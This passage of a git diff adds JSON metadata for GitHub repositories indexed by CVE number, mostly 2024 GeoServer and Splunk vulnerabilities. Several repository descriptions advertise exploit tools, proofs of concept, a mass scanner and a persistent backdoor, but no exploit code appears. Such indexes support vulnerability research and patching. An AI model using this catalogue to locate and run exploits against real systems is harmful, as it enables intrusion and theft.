"https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-36401", + "description": "Exploiter a Vulnerability detection and Exploitation tool for GeoServer Unauthenticated Remote Code Execution CVE-2024-36401.", + "fork": false, + "created_at": "2024-07-05T15:24:50Z", + "updated_at": "2024-07-20T21:01:18Z", + "pushed_at": "2024-07-05T15:33:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824794128, + "name": "CVE-2024-36401", + "full_name": "Mr-xn\/CVE-2024-36401", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-36401", + "description": "Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions with multies ways to exploit", + "fork": false, + "created_at": "2024-07-06T01:10:28Z", + "updated_at": "2024-10-08T10:14:01Z", + "pushed_at": "2024-07-06T01:57:58Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-36401", + "geoserver", + "poc", + "rce", + "vulnerabilities" + ], + "visibility": "public", + "forks": 4, + "watchers": 43, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827686717, + "name": "CVE-2024-36401-GeoServer-RCE", + "full_name": "jakabakos\/CVE-2024-36401-GeoServer-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-36401-GeoServer-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-12T07:01:12Z", + "updated_at": "2024-07-12T07:07:18Z", + "pushed_at": "2024-07-12T07:07:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829775784, + "name": "geoserver-", + "full_name": "ahisec\/geoserver-", + "owner": { + "login": "ahisec", + "id": 3255339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3255339?v=4", + "html_url": "https:\/\/github.com\/ahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahisec\/geoserver-", + "description": "geoserver CVE-2024-36401漏洞利用工具", + "fork": false, + "created_at": "2024-07-17T02:25:21Z", + "updated_at": "2024-11-27T06:22:42Z", + "pushed_at": "2024-07-24T15:33:03Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 835900082, + "name": "CVE-2024-36401", + "full_name": "Chocapikk\/CVE-2024-36401", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-36401", + "description": "GeoServer Remote Code Execution", + "fork": false, + "created_at": "2024-07-30T18:43:40Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-02T14:57:26Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836929821, + "name": "CVE-2024-36401-PoC", + "full_name": "yisas93\/CVE-2024-36401-PoC", + "owner": { + "login": "yisas93", + "id": 115517295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115517295?v=4", + "html_url": "https:\/\/github.com\/yisas93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yisas93\/CVE-2024-36401-PoC", + "description": null, + "fork": false, + "created_at": "2024-08-01T21:22:51Z", + "updated_at": "2024-08-01T21:30:07Z", + "pushed_at": "2024-08-01T21:30:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848340676, + "name": "geoexplorer", + "full_name": "justin-p\/geoexplorer", + "owner": { + "login": "justin-p", + "id": 8249280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8249280?v=4", + "html_url": "https:\/\/github.com\/justin-p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justin-p\/geoexplorer", + "description": "Mass scanner for CVE-2024-36401", + "fork": false, + "created_at": "2024-08-27T15:28:04Z", + "updated_at": "2024-10-23T10:07:20Z", + "pushed_at": "2024-08-27T16:16:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856852823, + "name": "CVE-2024-36401-PoC", + "full_name": "daniellowrie\/CVE-2024-36401-PoC", + "owner": { + "login": "daniellowrie", + "id": 19762230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19762230?v=4", + "html_url": "https:\/\/github.com\/daniellowrie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniellowrie\/CVE-2024-36401-PoC", + "description": "Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1", + "fork": false, + "created_at": "2024-09-13T10:28:48Z", + "updated_at": "2024-10-12T17:59:41Z", + "pushed_at": "2024-09-26T13:20:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864563382, + "name": "GeoServer-CVE-2024-36401", + "full_name": "PunitTailor55\/GeoServer-CVE-2024-36401", + "owner": { + "login": "PunitTailor55", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/PunitTailor55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PunitTailor55\/GeoServer-CVE-2024-36401", + "description": "GeoServer CVE-2024-36401: Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions", + "fork": false, + "created_at": "2024-09-28T14:55:50Z", + "updated_at": "2024-09-30T09:00:33Z", + "pushed_at": "2024-09-28T14:58:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868038376, + "name": "CVE-2024-36401", + "full_name": "netuseradministrator\/CVE-2024-36401", + "owner": { + "login": "netuseradministrator", + "id": 96680088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96680088?v=4", + "html_url": "https:\/\/github.com\/netuseradministrator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netuseradministrator\/CVE-2024-36401", + "description": "geoserver图形化漏洞利用工具", + "fork": false, + "created_at": "2024-10-05T10:08:55Z", + "updated_at": "2024-11-28T12:28:01Z", + "pushed_at": "2024-10-08T03:16:26Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872538624, + "name": "CVE-2024-36401", + "full_name": "kkhackz0013\/CVE-2024-36401", + "owner": { + "login": "kkhackz0013", + "id": 183632565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183632565?v=4", + "html_url": "https:\/\/github.com\/kkhackz0013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkhackz0013\/CVE-2024-36401", + "description": null, + "fork": false, + "created_at": "2024-10-14T15:57:06Z", + "updated_at": "2024-10-14T17:16:07Z", + "pushed_at": "2024-10-14T17:16:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892410177, + "name": "CVE-2024-36401-WoodpeckerPlugin", + "full_name": "thestar0\/CVE-2024-36401-WoodpeckerPlugin", + "owner": { + "login": "thestar0", + "id": 97114131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97114131?v=4", + "html_url": "https:\/\/github.com\/thestar0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thestar0\/CVE-2024-36401-WoodpeckerPlugin", + "description": "CVE-2024-36401-GeoServer Property 表达式注入 Rce woodpecker-framework 插件", + "fork": false, + "created_at": "2024-11-22T03:57:12Z", + "updated_at": "2024-11-28T15:22:40Z", + "pushed_at": "2024-11-23T08:24:26Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892655439, + "name": "cve-2024-36401-poc", + "full_name": "XiaomingX\/cve-2024-36401-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-36401-poc", + "description": "CVE-2024-36401是GeoServer中的一个高危远程代码执行漏洞。GeoServer是一款开源的地理数据服务器软件,主要用于发布、共享和处理各种地理空间数据。 ALIYUN 漏洞原理: 该漏洞源于GeoServer在处理属性名称时,将其不安全地解析为XPath表达式。具体而言,GeoServer调用的GeoTools库API在评估要素类型的属性名称时,以不安全的方式将其传递给commons-jxpath库。由于commons-jxpath库在解析XPath表达式时允许执行任意代码,攻击者可以通过构造特定的输入,利用多个OGC请求参数(如WFS GetFeature、WFS GetPropertyValue、WMS GetMap等),在未经身份验证的情况下远程执行任意代码。 ", + "fork": false, + "created_at": "2024-11-22T14:21:53Z", + "updated_at": "2024-11-22T14:57:02Z", + "pushed_at": "2024-11-22T14:22:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895213731, + "name": "CVE-2024-36401", + "full_name": "0x0d3ad\/CVE-2024-36401", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-36401", + "description": "CVE-2024-36401 GeoServer Remote Code Execution", + "fork": false, + "created_at": "2024-11-27T19:13:49Z", + "updated_at": "2024-11-28T01:53:47Z", + "pushed_at": "2024-11-27T19:20:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36416.json b/2024/CVE-2024-36416.json new file mode 100644 index 0000000000..3046fcffae --- /dev/null +++ b/2024/CVE-2024-36416.json @@ -0,0 +1,33 @@ +[ + { + "id": 812538216, + "name": "CVE-2024-36416", + "full_name": "kva55\/CVE-2024-36416", + "owner": { + "login": "kva55", + "id": 60018788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60018788?v=4", + "html_url": "https:\/\/github.com\/kva55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kva55\/CVE-2024-36416", + "description": "Tool for validating \/ testing CVE-2024-36416", + "fork": false, + "created_at": "2024-06-09T07:18:54Z", + "updated_at": "2024-06-15T05:26:59Z", + "pushed_at": "2024-06-15T05:26:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36424.json b/2024/CVE-2024-36424.json new file mode 100644 index 0000000000..e64ffbedca --- /dev/null +++ b/2024/CVE-2024-36424.json @@ -0,0 +1,33 @@ +[ + { + "id": 841733200, + "name": "CVE-2024-36424", + "full_name": "secunnix\/CVE-2024-36424", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-36424", + "description": "K7 Ultimate Security < v17.0.2019 \"K7RKScan.sys\" Null Pointer Dereference PoC ", + "fork": false, + "created_at": "2024-08-13T00:06:17Z", + "updated_at": "2024-11-20T16:31:01Z", + "pushed_at": "2024-08-13T00:26:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36527.json b/2024/CVE-2024-36527.json new file mode 100644 index 0000000000..ef9f977ac1 --- /dev/null +++ b/2024/CVE-2024-36527.json @@ -0,0 +1,33 @@ +[ + { + "id": 817716170, + "name": "CVE-2024-36527", + "full_name": "bigb0x\/CVE-2024-36527", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36527", + "description": "POC for CVE-2024-36527: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal", + "fork": false, + "created_at": "2024-06-20T09:42:07Z", + "updated_at": "2024-06-22T00:50:37Z", + "pushed_at": "2024-06-22T00:50:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36539.json b/2024/CVE-2024-36539.json new file mode 100644 index 0000000000..545e1bbb94 --- /dev/null +++ b/2024/CVE-2024-36539.json @@ -0,0 +1,33 @@ +[ + { + "id": 837496814, + "name": "CVE-2024-36539", + "full_name": "Abdurahmon3236\/CVE-2024-36539", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-36539", + "description": null, + "fork": false, + "created_at": "2024-08-03T06:37:21Z", + "updated_at": "2024-08-03T06:37:57Z", + "pushed_at": "2024-08-03T06:37:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3656.json b/2024/CVE-2024-3656.json new file mode 100644 index 0000000000..f532ed72b2 --- /dev/null +++ b/2024/CVE-2024-3656.json @@ -0,0 +1,33 @@ +[ + { + "id": 871549647, + "name": "CVE-2024-3656", + "full_name": "h4x0r-dz\/CVE-2024-3656", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-3656", + "description": "Keycloak admin API allows low privilege users to use administrative functions", + "fork": false, + "created_at": "2024-10-12T09:17:00Z", + "updated_at": "2024-10-25T06:06:55Z", + "pushed_at": "2024-10-12T09:48:10Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36821.json b/2024/CVE-2024-36821.json new file mode 100644 index 0000000000..eb77f4bce3 --- /dev/null +++ b/2024/CVE-2024-36821.json @@ -0,0 +1,33 @@ +[ + { + "id": 813172649, + "name": "CVE-2024-36821", + "full_name": "IvanGlinkin\/CVE-2024-36821", + "owner": { + "login": "IvanGlinkin", + "id": 64857726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64857726?v=4", + "html_url": "https:\/\/github.com\/IvanGlinkin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IvanGlinkin\/CVE-2024-36821", + "description": "The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821", + "fork": false, + "created_at": "2024-06-10T15:52:02Z", + "updated_at": "2024-11-15T19:16:54Z", + "pushed_at": "2024-06-10T16:07:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36823.json b/2024/CVE-2024-36823.json new file mode 100644 index 0000000000..dc481937df --- /dev/null +++ b/2024/CVE-2024-36823.json @@ -0,0 +1,33 @@ +[ + { + "id": 882521071, + "name": "CVE-2024-36823-POC", + "full_name": "JAckLosingHeart\/CVE-2024-36823-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-36823-POC", + "description": null, + "fork": false, + "created_at": "2024-11-03T01:56:11Z", + "updated_at": "2024-11-03T01:56:39Z", + "pushed_at": "2024-11-03T01:56:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36837.json b/2024/CVE-2024-36837.json new file mode 100644 index 0000000000..123cc8b176 --- /dev/null +++ b/2024/CVE-2024-36837.json @@ -0,0 +1,64 @@ +[ + { + "id": 815626615, + "name": "CVE-2024-36837", + "full_name": "phtcloud-dev\/CVE-2024-36837", + "owner": { + "login": "phtcloud-dev", + "id": 151622760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151622760?v=4", + "html_url": "https:\/\/github.com\/phtcloud-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phtcloud-dev\/CVE-2024-36837", + "description": "CVE-2024-36837 POC", + "fork": false, + "created_at": "2024-06-15T16:44:51Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T17:34:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864484527, + "name": "CVE-2024-36837", + "full_name": "lhc321-source\/CVE-2024-36837", + "owner": { + "login": "lhc321-source", + "id": 176809814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176809814?v=4", + "html_url": "https:\/\/github.com\/lhc321-source", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhc321-source\/CVE-2024-36837", + "description": "CVE-2024-36837 POC", + "fork": false, + "created_at": "2024-09-28T10:44:03Z", + "updated_at": "2024-10-15T02:28:08Z", + "pushed_at": "2024-09-28T10:48:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36842.json b/2024/CVE-2024-36842.json new file mode 100644 index 0000000000..f87b0f9b29 --- /dev/null +++ b/2024/CVE-2024-36842.json @@ -0,0 +1,33 @@ +[ + { + "id": 798261880, + "name": "CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "full_name": "abbiy\/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "owner": { + "login": "abbiy", + "id": 19267773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19267773?v=4", + "html_url": "https:\/\/github.com\/abbiy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abbiy\/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "description": "CVE-2024-36842, Creating Persistent Backdoor on Oncord+ android\/ios car infotaiment using malicious script!", + "fork": false, + "created_at": "2024-05-09T12:28:11Z", + "updated_at": "2024-10-15T04:58:34Z", + "pushed_at": "2024-07-31T10:15:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36877.json b/2024/CVE-2024-36877.json new file mode 100644 index 0000000000..77b744d573 --- /dev/null +++ b/2024/CVE-2024-36877.json @@ -0,0 +1,64 @@ +[ + { + "id": 840386878, + "name": "CVE-2024-36877", + "full_name": "jjensn\/CVE-2024-36877", + "owner": { + "login": "jjensn", + "id": 5910157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5910157?v=4", + "html_url": "https:\/\/github.com\/jjensn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jjensn\/CVE-2024-36877", + "description": "Exploit POC for CVE-2024-36877", + "fork": false, + "created_at": "2024-08-09T15:33:04Z", + "updated_at": "2024-11-16T03:22:28Z", + "pushed_at": "2024-08-14T15:26:18Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843925784, + "name": "POC-CVE-2024-36877", + "full_name": "CERTologists\/POC-CVE-2024-36877", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/POC-CVE-2024-36877", + "description": null, + "fork": false, + "created_at": "2024-08-17T20:47:52Z", + "updated_at": "2024-08-17T20:49:57Z", + "pushed_at": "2024-08-17T20:49:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36991.json b/2024/CVE-2024-36991.json new file mode 100644 index 0000000000..ec5801d57c --- /dev/null +++ b/2024/CVE-2024-36991.json @@ -0,0 +1,163 @@ +[ + { + "id": 824790619, + "name": "CVE-2024-36991", + "full_name": "bigb0x\/CVE-2024-36991", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36991", + "description": "POC for CVE-2024-36991: This exploit will attempt to read Splunk \/etc\/passwd file.", + "fork": false, + "created_at": "2024-07-06T00:49:40Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-12T00:41:36Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 113, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 824792553, + "name": "CVE-2024-36991", + "full_name": "Mr-xn\/CVE-2024-36991", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-36991", + "description": "Path Traversal On The \"\/Modules\/Messaging\/\" Endpoint In Splunk Enterprise On Windows", + "fork": false, + "created_at": "2024-07-06T01:00:57Z", + "updated_at": "2024-07-08T13:21:27Z", + "pushed_at": "2024-07-06T01:07:32Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024", + "cve-2024-36991", + "path-traversal", + "splunk" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825033678, + "name": "CVE-2024-36991", + "full_name": "th3gokul\/CVE-2024-36991", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-36991", + "description": "CVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10.", + "fork": false, + "created_at": "2024-07-06T15:24:24Z", + "updated_at": "2024-07-31T07:00:23Z", + "pushed_at": "2024-07-06T15:53:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825068060, + "name": "CVE-2024-36991", + "full_name": "sardine-web\/CVE-2024-36991", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-36991", + "description": "Path traversal vulnerability in Splunk Enterprise on Windows", + "fork": false, + "created_at": "2024-07-06T17:15:39Z", + "updated_at": "2024-07-06T17:24:14Z", + "pushed_at": "2024-07-06T17:24:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826744857, + "name": "CVE-2024-36991", + "full_name": "Cappricio-Securities\/CVE-2024-36991", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-36991", + "description": "Path traversal vulnerability in Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10 that allows reading sensitive files.", + "fork": false, + "created_at": "2024-07-10T09:42:08Z", + "updated_at": "2024-07-21T08:58:48Z", + "pushed_at": "2024-07-10T09:42:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 